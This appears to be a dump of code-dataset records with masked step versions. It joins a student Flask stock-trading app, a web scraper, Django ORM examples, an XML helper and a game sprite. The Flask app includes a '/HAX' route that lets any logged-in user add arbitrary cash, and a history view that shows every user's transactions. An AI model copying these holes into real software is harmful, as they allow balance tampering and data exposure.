%H:%M:%S','now'))\",session[\"user_id\"],int(shares),quote[\"symbol\"],float(quote[\"price\"]))\n\n #deduct the cash\n total=int(quote[\"price\"])*int(shares)\n db.execute(\"UPDATE 
users SET cash=cash- (?) WHERE id=?\",total,session[\"user_id\"])\n\n return redirect(\"/\")\n\n else:\n return render_template(\"buy.html\")\n\[email protected](\"/history\")\n@login_required\ndef history():\n \"\"\"Show history of transactions\"\"\"\n rows=db.execute(\"SELECT * FROM record ORDER BY t1\")\n return render_template(\"history.html\",rows=rows)\n\n\[email protected](\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Log user in\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 403)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 403)\n\n # Query database for username\n rows = db.execute(\"SELECT * FROM users WHERE username = ?\", request.form.get(\"username\"))\n\n # Ensure username exists and password is correct\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid username and/or password\", 403)\n\n # Remember which user has logged in\n session[\"user_id\"] = rows[0][\"id\"]\n\n # Redirect user to home page\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n\[email protected](\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # Redirect user to login form\n return redirect(\"/\")\n\n\[email protected](\"/quote\", methods=[\"GET\", \"POST\"])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n if request.method==\"POST\":\n quote=lookup(request.form.get(\"symbol\"))\n if quote==None:\n return apology(\"Invalid symbol\",400)\n price=usd(quote[\"price\"])\n return render_template(\"quoted.html\",quote=quote,price=price)\n else:\n return render_template(\"quote.html\")\n\[email protected](\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 400)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 400)\n\n # Ensure comfirm password was submitted\n elif not request.form.get(\"confirmation\"):\n return apology(\"must comfirm password\", 400)\n\n # Ensure password matches\n elif request.form.get(\"confirmation\") != request.form.get(\"password\"):\n return apology(\"Password not matches\",400)\n\n # Ensure username is new(unique)\n rows = db.execute(\"SELECT * FROM users WHERE username = ?\", request.form.get(\"username\"))\n if len(rows) != 0:\n return apology(\"username used\", 400)\n\n db.execute(\"INSERT INTO users (username,hash) VALUES (?,?)\",request.form.get(\"username\"),generate_password_hash(request.form.get(\"password\")))\n\n\n # Redirect user to home page\n return redirect(\"/\")\n\n\n else:\n return render_template(\"register.html\")\n\n\[email protected](\"/sell\", methods=[\"GET\", \"POST\"])\n@login_required\ndef sell():\n \"\"\"Sell shares of stock\"\"\"\n if request.method=='POST':\n #parameter is not filled\n if not request.form.get(\"shares\"):\n return apology(\"Please enter how much u want to sell\",400)\n #check if shares(amount) that are going to be sell less than 
owner's share.\n sell=request.form.get(\"symbol\")\n shares=request.form.get(\"shares\")\n amount=db.execute(\"SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions\",session[\"user_id\"],sell)\n if amount[0][\"amount\"]<int(shares):\n return apology(\"You dont own that much shares\",400)\n\n #record sell and add cash amount\n quote=lookup(sell)\n price=quote[\"price\"]\n total=int(price)*int(shares)\n\n db.execute(\"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))\",session[\"user_id\"],(int(shares)*-1),quote[\"symbol\"],price)\n db.execute(\"UPDATE users SET cash=cash+ (?) WHERE id=?\",total,session[\"user_id\"])\n\n return redirect(\"/\")\n\n else:\n rows=db.execute(\"SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions\",session[\"user_id\"])\n\n return render_template(\"sell.html\",rows=rows)\n\n\n\[email protected](\"/HAX\", methods=[\"GET\", \"POST\"])\n@login_required\ndef HAX():\n #add free monei boiiii\n if request.method==\"POST\":\n total=request.form.get(\"HAX\")\n db.execute(\"UPDATE users SET cash=cash+ (?) WHERE id=?\",total,session[\"user_id\"])\n flash(u'HAX SUCCESSFULLY ACTIVATED!!!')\n\n return redirect(\"/\")\n\n else:\n return render_template(\"HAX.html\")\n\n\n\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n return apology(e.name, e.code)\n\n\n# Listen for errors\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)\n",
"step-ids": [
3,
9,
13,
14,
15
]
}
|
[
3,
9,
13,
14,
15
] |
# *Using Min & Max Exercise
def extremes(nums):
return (max(nums), min(nums))
|
normal
|
{
"blob_id": "0577c274672bac333500535f21f568ade62100c7",
"index": 3580,
"step-1": "<mask token>\n",
"step-2": "def extremes(nums):\n return max(nums), min(nums)\n",
"step-3": "\n# *Using Min & Max Exercise\ndef extremes(nums):\n return (max(nums), min(nums))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def estudios(Minisoup):
print('2.Estudios')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def estudios(Minisoup):
print('2.Estudios')
try:
html_content = requests.get(url2).text
except:
print(f'unable to get {url2}')
sys.exit(1)
<|reserved_special_token_0|>
print('Display all items from topmenu:')
<|reserved_special_token_0|>
for datos in tabla.findAll('li'):
celda = datos.text
b += 1
print(b, '<', celda, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display all Estudios:')
<|reserved_special_token_0|>
for datos in tablas1.findAll('div', {'class': 'estudios'}):
celdas = datos.text
print('-', celdas)
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display from leftbar all <li> items:')
<|reserved_special_token_0|>
for datos in tablas2.findAll('li'):
celdas2 = datos.text
c += 1
print(c, '<', celdas2, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'Get and display all available social media with its links (href) class =social pull -right:'
)
<|reserved_special_token_0|>
for datos in tablas3.findAll('a'):
celdas3 = datos.get('href')
print('-<', celdas3, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
<|reserved_special_token_0|>
for datos in soup.find_all('a'):
d += 1
print('count all <a: <', d, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'======================================================================================================='
)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
url2 = 'http://ufm.edu/Estudios'
def estudios(Minisoup):
print('2.Estudios')
try:
html_content = requests.get(url2).text
except:
print(f'unable to get {url2}')
sys.exit(1)
soup = BeautifulSoup(html_content, 'html.parser')
print('Display all items from topmenu:')
b = 0
tabla = soup.find('div', {'id': 'topmenu'})
for datos in tabla.findAll('li'):
celda = datos.text
b += 1
print(b, '<', celda, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display all Estudios:')
tablas1 = soup.find('div', {'id': 'mw-content-text'})
for datos in tablas1.findAll('div', {'class': 'estudios'}):
celdas = datos.text
print('-', celdas)
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display from leftbar all <li> items:')
c = 0
tablas2 = soup.find('div', {'class': 'leftbar'})
for datos in tablas2.findAll('li'):
celdas2 = datos.text
c += 1
print(c, '<', celdas2, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'Get and display all available social media with its links (href) class =social pull -right:'
)
tablas3 = soup.find('div', {'class': 'social pull-right'})
for datos in tablas3.findAll('a'):
celdas3 = datos.get('href')
print('-<', celdas3, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
d = 0
for datos in soup.find_all('a'):
d += 1
print('count all <a: <', d, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'======================================================================================================='
)
<|reserved_special_token_1|>
from bs4 import BeautifulSoup, CData
import requests, sys, csv, json, os, urllib.request, re
import json
url2 = 'http://ufm.edu/Estudios'
def estudios(Minisoup):
print('2.Estudios')
try:
html_content = requests.get(url2).text
except:
print(f'unable to get {url2}')
sys.exit(1)
soup = BeautifulSoup(html_content, 'html.parser')
print('Display all items from topmenu:')
b = 0
tabla = soup.find('div', {'id': 'topmenu'})
for datos in tabla.findAll('li'):
celda = datos.text
b += 1
print(b, '<', celda, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display all Estudios:')
tablas1 = soup.find('div', {'id': 'mw-content-text'})
for datos in tablas1.findAll('div', {'class': 'estudios'}):
celdas = datos.text
print('-', celdas)
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display from leftbar all <li> items:')
c = 0
tablas2 = soup.find('div', {'class': 'leftbar'})
for datos in tablas2.findAll('li'):
celdas2 = datos.text
c += 1
print(c, '<', celdas2, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'Get and display all available social media with its links (href) class =social pull -right:'
)
tablas3 = soup.find('div', {'class': 'social pull-right'})
for datos in tablas3.findAll('a'):
celdas3 = datos.get('href')
print('-<', celdas3, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
d = 0
for datos in soup.find_all('a'):
d += 1
print('count all <a: <', d, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'======================================================================================================='
)
<|reserved_special_token_1|>
from bs4 import BeautifulSoup, CData
import requests,sys,csv,json,os, urllib.request, re
import json
url2 = "http://ufm.edu/Estudios"
def estudios(Minisoup):
print("2.Estudios")
#now navigate to /Estudios (better if you obtain href from the DOM)
try:
html_content = requests.get(url2).text
except:
print(f"unable to get {url2}")
sys.exit(1)
soup = BeautifulSoup(html_content, "html.parser")
#display all items from "topmenu" (8 in total)
print("Display all items from topmenu:")
b = 0
tabla = soup.find("div", { "id" : "topmenu" })
for datos in tabla.findAll("li"):
# for datos in tabla.findAll("a",{"class":"external text"}):
celda = datos.text
b += 1
print(b,"<",celda,">")
print("-------------------------------------------------------------------------------------------------------")
#display ALL "Estudios" (Doctorados/Maestrias/Posgrados/Licenciaturas/Baccalaureus)
print("Display all Estudios:")
tablas1 = soup.find("div",{"id":"mw-content-text"})
for datos in tablas1.findAll("div",{"class":"estudios"}):
celdas = datos.text
print("-",celdas)
print("-------------------------------------------------------------------------------------------------------")
#display from "leftbar" all <li> items (4 in total)
print("Display from leftbar all <li> items:")
c=0
tablas2 = soup.find("div",{"class":"leftbar"})
for datos in tablas2.findAll("li"):
#for datos in tablas2.findAll("a",{"class":"external text"}):
celdas2 = datos.text
c += 1
#print(celdas2)
print(c,"<",celdas2,">")
print("-------------------------------------------------------------------------------------------------------")
#get and display all available social media with its links (href) "class=social pull-right"
print("Get and display all available social media with its links (href) class =social pull -right:")
tablas3 = soup.find("div",{"class":"social pull-right"})
for datos in tablas3.findAll('a'):
celdas3 = datos.get('href')
print("-<",celdas3,">")
print("-------------------------------------------------------------------------------------------------------")
#count all <a> (just display the count)
d=0
for datos in soup.find_all('a'):
d += 1
print("count all <a: <",d,">")
print("-------------------------------------------------------------------------------------------------------")
print("=======================================================================================================")
|
flexible
|
{
"blob_id": "846682072a125c76fc9ffa011109abce7c3bb5d7",
"index": 3269,
"step-1": "<mask token>\n\n\ndef estudios(Minisoup):\n print('2.Estudios')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef estudios(Minisoup):\n print('2.Estudios')\n\n\ntry:\n html_content = requests.get(url2).text\nexcept:\n print(f'unable to get {url2}')\n sys.exit(1)\n<mask token>\nprint('Display all items from topmenu:')\n<mask token>\nfor datos in tabla.findAll('li'):\n celda = datos.text\n b += 1\n print(b, '<', celda, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display all Estudios:')\n<mask token>\nfor datos in tablas1.findAll('div', {'class': 'estudios'}):\n celdas = datos.text\n print('-', celdas)\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display from leftbar all <li> items:')\n<mask token>\nfor datos in tablas2.findAll('li'):\n celdas2 = datos.text\n c += 1\n print(c, '<', celdas2, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n 'Get and display all available social media with its links (href) class =social pull -right:'\n )\n<mask token>\nfor datos in tablas3.findAll('a'):\n celdas3 = datos.get('href')\n print('-<', celdas3, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\n<mask token>\nfor datos in soup.find_all('a'):\n d += 1\nprint('count all <a: <', d, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n '======================================================================================================='\n )\n",
"step-3": "<mask token>\nurl2 = 'http://ufm.edu/Estudios'\n\n\ndef estudios(Minisoup):\n print('2.Estudios')\n\n\ntry:\n html_content = requests.get(url2).text\nexcept:\n print(f'unable to get {url2}')\n sys.exit(1)\nsoup = BeautifulSoup(html_content, 'html.parser')\nprint('Display all items from topmenu:')\nb = 0\ntabla = soup.find('div', {'id': 'topmenu'})\nfor datos in tabla.findAll('li'):\n celda = datos.text\n b += 1\n print(b, '<', celda, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display all Estudios:')\ntablas1 = soup.find('div', {'id': 'mw-content-text'})\nfor datos in tablas1.findAll('div', {'class': 'estudios'}):\n celdas = datos.text\n print('-', celdas)\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display from leftbar all <li> items:')\nc = 0\ntablas2 = soup.find('div', {'class': 'leftbar'})\nfor datos in tablas2.findAll('li'):\n celdas2 = datos.text\n c += 1\n print(c, '<', celdas2, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n 'Get and display all available social media with its links (href) class =social pull -right:'\n )\ntablas3 = soup.find('div', {'class': 'social pull-right'})\nfor datos in tablas3.findAll('a'):\n celdas3 = datos.get('href')\n print('-<', celdas3, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nd = 0\nfor datos in soup.find_all('a'):\n d += 1\nprint('count all <a: <', d, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n '======================================================================================================='\n )\n",
"step-4": "from bs4 import BeautifulSoup, CData\nimport requests, sys, csv, json, os, urllib.request, re\nimport json\nurl2 = 'http://ufm.edu/Estudios'\n\n\ndef estudios(Minisoup):\n print('2.Estudios')\n\n\ntry:\n html_content = requests.get(url2).text\nexcept:\n print(f'unable to get {url2}')\n sys.exit(1)\nsoup = BeautifulSoup(html_content, 'html.parser')\nprint('Display all items from topmenu:')\nb = 0\ntabla = soup.find('div', {'id': 'topmenu'})\nfor datos in tabla.findAll('li'):\n celda = datos.text\n b += 1\n print(b, '<', celda, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display all Estudios:')\ntablas1 = soup.find('div', {'id': 'mw-content-text'})\nfor datos in tablas1.findAll('div', {'class': 'estudios'}):\n celdas = datos.text\n print('-', celdas)\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display from leftbar all <li> items:')\nc = 0\ntablas2 = soup.find('div', {'class': 'leftbar'})\nfor datos in tablas2.findAll('li'):\n celdas2 = datos.text\n c += 1\n print(c, '<', celdas2, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n 'Get and display all available social media with its links (href) class =social pull -right:'\n )\ntablas3 = soup.find('div', {'class': 'social pull-right'})\nfor datos in tablas3.findAll('a'):\n celdas3 = datos.get('href')\n print('-<', celdas3, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nd = 0\nfor datos in soup.find_all('a'):\n d += 1\nprint('count all <a: <', d, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n '======================================================================================================='\n )\n",
"step-5": "from bs4 import BeautifulSoup, CData\nimport requests,sys,csv,json,os, urllib.request, re\nimport json\n\n\nurl2 = \"http://ufm.edu/Estudios\"\ndef estudios(Minisoup):\n print(\"2.Estudios\")\n\n#now navigate to /Estudios (better if you obtain href from the DOM)\ntry:\n html_content = requests.get(url2).text\nexcept:\n print(f\"unable to get {url2}\")\n sys.exit(1)\n\nsoup = BeautifulSoup(html_content, \"html.parser\")\n\n#display all items from \"topmenu\" (8 in total)\nprint(\"Display all items from topmenu:\")\nb = 0\ntabla = soup.find(\"div\", { \"id\" : \"topmenu\" })\nfor datos in tabla.findAll(\"li\"):\n# for datos in tabla.findAll(\"a\",{\"class\":\"external text\"}):\n celda = datos.text\n b += 1\n print(b,\"<\",celda,\">\")\nprint(\"-------------------------------------------------------------------------------------------------------\")\n\n#display ALL \"Estudios\" (Doctorados/Maestrias/Posgrados/Licenciaturas/Baccalaureus)\nprint(\"Display all Estudios:\")\ntablas1 = soup.find(\"div\",{\"id\":\"mw-content-text\"})\nfor datos in tablas1.findAll(\"div\",{\"class\":\"estudios\"}):\n celdas = datos.text\n print(\"-\",celdas)\nprint(\"-------------------------------------------------------------------------------------------------------\")\n\n#display from \"leftbar\" all <li> items (4 in total)\nprint(\"Display from leftbar all <li> items:\")\nc=0\ntablas2 = soup.find(\"div\",{\"class\":\"leftbar\"})\nfor datos in tablas2.findAll(\"li\"):\n#for datos in tablas2.findAll(\"a\",{\"class\":\"external text\"}):\n celdas2 = datos.text\n c += 1\n #print(celdas2) \n print(c,\"<\",celdas2,\">\")\nprint(\"-------------------------------------------------------------------------------------------------------\")\n\n#get and display all available social media with its links (href) \"class=social pull-right\"\nprint(\"Get and display all available social media with its links (href) class =social pull -right:\")\ntablas3 = soup.find(\"div\",{\"class\":\"social pull-right\"})\nfor datos in tablas3.findAll('a'):\n celdas3 = datos.get('href')\n print(\"-<\",celdas3,\">\")\nprint(\"-------------------------------------------------------------------------------------------------------\")\n\n#count all <a> (just display the count)\nd=0\nfor datos in soup.find_all('a'):\n d += 1\nprint(\"count all <a: <\",d,\">\")\nprint(\"-------------------------------------------------------------------------------------------------------\")\nprint(\"=======================================================================================================\")",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
#some xml helpers
from xml.dom.minidom import Document
class XMLReport:
def __init__(self, name):
self.doc = Document()
self.main_node = self.add(name, node=self.doc)
def add(self, name, node=None):
if node is None: node = self.main_node
elem = self.doc.createElement(name)
node.appendChild(elem)
return elem
def text(self, text, node):
node.appendChild(self.doc.createTextNode(text))
def set_node_info(self, node, typ):
node.setAttribute("type-id", hex(typ.id))
node.setAttribute("name", typ.get_name())
def __str__(self):
return self.doc.toprettyxml(indent=" ")
|
normal
|
{
"blob_id": "146487738006ce3efb5bd35c425835a1fd8e0145",
"index": 9490,
"step-1": "# -*- coding: utf-8 -*-\n#some xml helpers\nfrom xml.dom.minidom import Document\n\nclass XMLReport:\n def __init__(self, name):\n\tself.doc = Document()\n\tself.main_node = self.add(name, node=self.doc)\n \n def add(self, name, node=None):\n\tif node is None: node = self.main_node\n\telem = self.doc.createElement(name)\n\tnode.appendChild(elem)\n\treturn elem\n \n def text(self, text, node):\n\tnode.appendChild(self.doc.createTextNode(text))\n \n def set_node_info(self, node, typ):\n\tnode.setAttribute(\"type-id\", hex(typ.id))\n\tnode.setAttribute(\"name\", typ.get_name())\n\n def __str__(self):\n\treturn self.doc.toprettyxml(indent=\" \")",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
def first_life_and_work(str_arg):
print(str_arg)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
def first_life_and_work(str_arg):
print(str_arg)
if __name__ == '__main__':
get_case('thing')
<|reserved_special_token_1|>
#! /usr/bin/env python
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
def first_life_and_work(str_arg):
print(str_arg)
if __name__ == '__main__':
get_case('thing')
|
flexible
|
{
"blob_id": "7a2ac3a3a2bbd7349e8cc62b4d357394d9600cc8",
"index": 6326,
"step-1": "<mask token>\n",
"step-2": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\n<mask token>\n",
"step-3": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\n\n<mask token>\n",
"step-4": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\n\nif __name__ == '__main__':\n get_case('thing')\n",
"step-5": "\n#! /usr/bin/env python\n\ndef get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\nif __name__ == '__main__':\n get_case('thing')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def firstDuplicate(array):
"""
Time O(n) | Space O(n)
"""
dic = {}
for num in array:
if num in dic:
return num
else:
dic[num] = True
return -1
print(firstDuplicate([2, 1, 3, 5, 3]))
|
normal
|
{
"blob_id": "47259844f76f12060f0cf52f1086c05b9f300175",
"index": 8581,
"step-1": "<mask token>\n",
"step-2": "def firstDuplicate(array):\n \"\"\"\n Time O(n) | Space O(n)\n \"\"\"\n dic = {}\n for num in array:\n if num in dic:\n return num\n else:\n dic[num] = True\n return -1\n\n\n<mask token>\n",
"step-3": "def firstDuplicate(array):\n \"\"\"\n Time O(n) | Space O(n)\n \"\"\"\n dic = {}\n for num in array:\n if num in dic:\n return num\n else:\n dic[num] = True\n return -1\n\n\nprint(firstDuplicate([2, 1, 3, 5, 3]))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
application_vue_demo = Blueprint('application_vue_demo', __name__)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from flask import Blueprint
application_vue_demo = Blueprint('application_vue_demo', __name__)
from . import views
|
flexible
|
{
"blob_id": "a33abd253288140f8051aced1d0ed1e41b2fc786",
"index": 8067,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napplication_vue_demo = Blueprint('application_vue_demo', __name__)\n<mask token>\n",
"step-3": "from flask import Blueprint\napplication_vue_demo = Blueprint('application_vue_demo', __name__)\nfrom . import views\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import os
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "day66.settings")
import django
django.setup()
from applistions.models import MyClass,Student,Teacher,Employee
from django.db.models import Avg, Sum, Max, Min, Count
# 1.求所有人里面工资最高的
ret = Employee.objects.all().aggregate(Max('salary'))
print(ret) # {'salary__max': 80909}
# # 指定返回字典中key的值
ret = Employee.objects.all().aggregate(max_salary=Max('salary'))
print(ret) # {'max_salary': 80909}
# # 求所有人的平均价格
ret = Employee.objects.all().aggregate(Avg('salary'))
print(ret) # {'salary__avg': 20855.1667}
# 使用ORM查询每个部门的平均工资
ret = Employee.objects.values('dept').aggregate(Avg('salary'))
print(ret) # 查询的是每个人的平均工资,此条查询错误
# annotate中要写上分住之后要做的事情
# anntate前面查询的是什么就按什么分组
ret = Employee.objects.values('dept').annotate(Avg('salary')).values_list('dept','salary__avg')
print(ret) # <QuerySet [('财务部', 2111.0), ('技术部', 17000.0), ('人事部', 6000.0), ('管理部', 80909.0)]>
# # ORM中分组使用annotate
# # 1. annotate中要写上分组之后要做的事情
# # 2. annotate前面查询的是什么就按什么分组
# ret = Employee.objects.values('dept').annotate(avg_price=Avg('salary')).values('dept', 'avg_price')
# print(ret)
#
# # 每个部门的平均年龄
ret = Employee.objects.values('dept').annotate(avg_age=Avg('age')).values_list('dept','avg_age')
print(ret) # <QuerySet [('财务部', 27.5), ('技术部', 300.0), ('人事部', 45.0), ('管理部', 45.0)]>
# # 求每个班级的学生的数量
ret = Student.objects.values('myclass').annotate(s_count=Count('id'))
print(ret) # <QuerySet [{'myclass': 1, 's_count': 1}, {'myclass': 2, 's_count': 3}, {'myclass': 3, 's_count': 2}, {'myclass': 4, 's_count': 1}, {'myclass': 5, 's_count': 1}, {'myclass': 6, 's_count': 1}, {'myclass': 7, 's_count': 1}]>
|
normal
|
{
"blob_id": "ee72262fb29b46784fb357269dd5160192968c1b",
"index": 1713,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'day66.settings')\n import django\n django.setup()\n from applistions.models import MyClass, Student, Teacher, Employee\n from django.db.models import Avg, Sum, Max, Min, Count\n ret = Employee.objects.all().aggregate(Max('salary'))\n print(ret)\n ret = Employee.objects.all().aggregate(max_salary=Max('salary'))\n print(ret)\n ret = Employee.objects.all().aggregate(Avg('salary'))\n print(ret)\n ret = Employee.objects.values('dept').aggregate(Avg('salary'))\n print(ret)\n ret = Employee.objects.values('dept').annotate(Avg('salary')).values_list(\n 'dept', 'salary__avg')\n print(ret)\n ret = Employee.objects.values('dept').annotate(avg_age=Avg('age')\n ).values_list('dept', 'avg_age')\n print(ret)\n ret = Student.objects.values('myclass').annotate(s_count=Count('id'))\n print(ret)\n",
"step-3": "import os\nif __name__ == '__main__':\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'day66.settings')\n import django\n django.setup()\n from applistions.models import MyClass, Student, Teacher, Employee\n from django.db.models import Avg, Sum, Max, Min, Count\n ret = Employee.objects.all().aggregate(Max('salary'))\n print(ret)\n ret = Employee.objects.all().aggregate(max_salary=Max('salary'))\n print(ret)\n ret = Employee.objects.all().aggregate(Avg('salary'))\n print(ret)\n ret = Employee.objects.values('dept').aggregate(Avg('salary'))\n print(ret)\n ret = Employee.objects.values('dept').annotate(Avg('salary')).values_list(\n 'dept', 'salary__avg')\n print(ret)\n ret = Employee.objects.values('dept').annotate(avg_age=Avg('age')\n ).values_list('dept', 'avg_age')\n print(ret)\n ret = Student.objects.values('myclass').annotate(s_count=Count('id'))\n print(ret)\n",
"step-4": "import os\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"day66.settings\")\n\n import django\n django.setup()\n\n from applistions.models import MyClass,Student,Teacher,Employee\n from django.db.models import Avg, Sum, Max, Min, Count\n\n # 1.求所有人里面工资最高的\n ret = Employee.objects.all().aggregate(Max('salary'))\n print(ret) # {'salary__max': 80909}\n\n # # 指定返回字典中key的值\n ret = Employee.objects.all().aggregate(max_salary=Max('salary'))\n print(ret) # {'max_salary': 80909}\n\n # # 求所有人的平均价格\n ret = Employee.objects.all().aggregate(Avg('salary'))\n print(ret) # {'salary__avg': 20855.1667}\n\n # 使用ORM查询每个部门的平均工资\n ret = Employee.objects.values('dept').aggregate(Avg('salary'))\n print(ret) # 查询的是每个人的平均工资,此条查询错误\n # annotate中要写上分住之后要做的事情\n # anntate前面查询的是什么就按什么分组\n ret = Employee.objects.values('dept').annotate(Avg('salary')).values_list('dept','salary__avg')\n print(ret) # <QuerySet [('财务部', 2111.0), ('技术部', 17000.0), ('人事部', 6000.0), ('管理部', 80909.0)]>\n\n # # ORM中分组使用annotate\n # # 1. annotate中要写上分组之后要做的事情\n # # 2. annotate前面查询的是什么就按什么分组\n # ret = Employee.objects.values('dept').annotate(avg_price=Avg('salary')).values('dept', 'avg_price')\n # print(ret)\n #\n # # 每个部门的平均年龄\n ret = Employee.objects.values('dept').annotate(avg_age=Avg('age')).values_list('dept','avg_age')\n print(ret) # <QuerySet [('财务部', 27.5), ('技术部', 300.0), ('人事部', 45.0), ('管理部', 45.0)]>\n\n # # 求每个班级的学生的数量\n ret = Student.objects.values('myclass').annotate(s_count=Count('id'))\n print(ret) # <QuerySet [{'myclass': 1, 's_count': 1}, {'myclass': 2, 's_count': 3}, {'myclass': 3, 's_count': 2}, {'myclass': 4, 's_count': 1}, {'myclass': 5, 's_count': 1}, {'myclass': 6, 's_count': 1}, {'myclass': 7, 's_count': 1}]>\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Dot(Sprite):
<|reserved_special_token_0|>
def update(self, dt):
arena = self.parent.parent
snake = arena.snake
self.check_kill(snake)
for s in arena.enemies:
self.check_kill(s)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Dot(Sprite):
def __init__(self, pos=None, color=None):
if color is None:
color = random.choice(define.ALL_COLOR)
super(Dot, self).__init__('circle.png', color=color)
self.killed = False
if pos is None:
self.position = random.randint(40, define.WIDTH - 40
), random.randint(40, define.HEIGHT - 40)
self.is_big = False
self.scale = 0.8
else:
self.position = pos[0] + random.random() * 32 - 16, pos[1
] + random.random() * 32 - 16
self.is_big = True
self.schedule_interval(self.update, random.random() * 0.2 + 0.1)
def update(self, dt):
arena = self.parent.parent
snake = arena.snake
self.check_kill(snake)
for s in arena.enemies:
self.check_kill(s)
def check_kill(self, snake):
if (not self.killed and not snake.is_dead) and (abs(snake.x - self.
x) < 32 and abs(snake.y - self.y) < 32):
self.killed = True
self.killer = snake
self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def kill(spr):
spr.unschedule(spr.update)
arena = spr.parent.parent
if not spr.is_big:
arena.batch.add(Dot())
spr.killer.add_score()
else:
spr.killer.add_score(2)
